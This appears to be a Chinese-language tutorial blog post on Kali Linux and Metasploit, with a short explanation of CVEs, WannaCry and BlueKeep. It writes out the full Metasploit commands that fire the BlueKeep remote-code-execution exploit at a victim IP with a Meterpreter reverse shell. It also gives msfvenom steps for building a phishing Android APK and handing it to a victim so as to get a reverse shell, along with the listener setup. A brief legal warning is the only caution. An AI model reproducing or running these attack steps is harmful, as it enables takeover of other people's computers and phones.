[Day29] - kali 0x4 Metasploit

Day29 - kali 0x4 Metasploit

前言

  • 昨天提完破密工具之後,今天来讲讲这个exploit整合包

CVE (Common Vulnerabilities and Exposures)

  • 通用漏洞披漏 (常见弱点和漏洞)
  • 一个与资讯安全有关的资料库,收集各种资安弱点及漏洞并给予编号以便於公众查阅

Rule

  • CVE - YYYY - NNNN
  • CVE - (西元分) - (流水号)

Wannacry (CVE-2017-0143~0148)

  • 内容: 利用 windows 漏洞 (MS17-010) 永恒之蓝
  • 影响范围: windows 7 版本之前
  • 受感染的电脑会有大量档案被加密,并且要求高价彼特币赎金

BlueKeep (CVE-2019-0708)

Metasploit

  • 接着我们提提今天重头戏Metasploit,他整合了部分CVE的exploit,让使用者可以透过简单的指令打出漏洞

What is Metasploit?

基本用法

  • 启动: msfconsole
  • 查询漏洞: search <漏洞名称>
  • 选择漏洞: use <漏洞档案>

使用方式(以 CVE 2019-0708 做举例)

汇入exploit

  • 可在exploit-db上面找exploit汇入到Metasploit中

新版的kali已经预设就有这个exploit了,不须汇入

找 exploit

  • cve_2019_0708_bluekeep_rce.rb
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //选择exploit
show options //查看设定参数
set rhosts <target_ip> //设定被害者的ip
set GROOMSIZE 50 
set payload windows/x64/meterpreter/reverse_tcp //设定攻击payload
set lhost <your_ip>
// windows7 SP1 VBOX
set target 2
run //攻击脚本执行
//成功之後 shell 可进对方 cmd

Meterpreter

  • 破解成功之後的後门程序
  • 添加一个用户,隐藏一些东西,打开shell等等
  • windows/Linux/Android...都有支援

打成功就可以拿到shell

配合meterpreter,就可以拿到shell


同场加映 - 制作钓鱼 APK

  • msfvenom -p android/meterpreter/reverse_tcp
  • LHOST=<your_ip> LPORT=<port> > <file>
  • 然後就会在电脑生成apk,这时候拿给受害者装app,就可以拿到shell了

Android Reverse shell

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit

技术总结

  • Kali 工具多到爆,有兴趣可以自行研究
  • 常常关注 CVE,Metasploit 的最新动态
  • 台湾有法律,好自为之

<<:  谁温暖了资安部-26(资安事件与Log)

>>:  Day27 Web Security - Social Engineering

【Day 16】jQuery事件

jQuery事件 说明:是为响应 HTML 页面中的事件而订制的。 何谓事件(Events)? 网页...

Day 23 Selenium模组二

今天的影片内容为介绍selenium的webdriver物件用来寻找网页元素的方法 其实跟Beaut...

IOS、Python自学心得30天 Day-7 TensorFlow 结果预测

执行过後的结果大概是像这样 不过执行结果并不理想 不确定是否是训练样本不足 还是训练模型时的设定没有...

[DAY 1]前言

我主要身分是软件工程师,参赛ARM主题纯粹是兴趣,毕竟隔行如隔山,软件、韧体、硬体差异太大。希望在这...

Day 1 : Kotlin Multiplatform Mobile ,欢迎新的跨平台挑战者

Keyword: Kotlin Multiplatform Mobile (在每篇的开头会标注这篇的...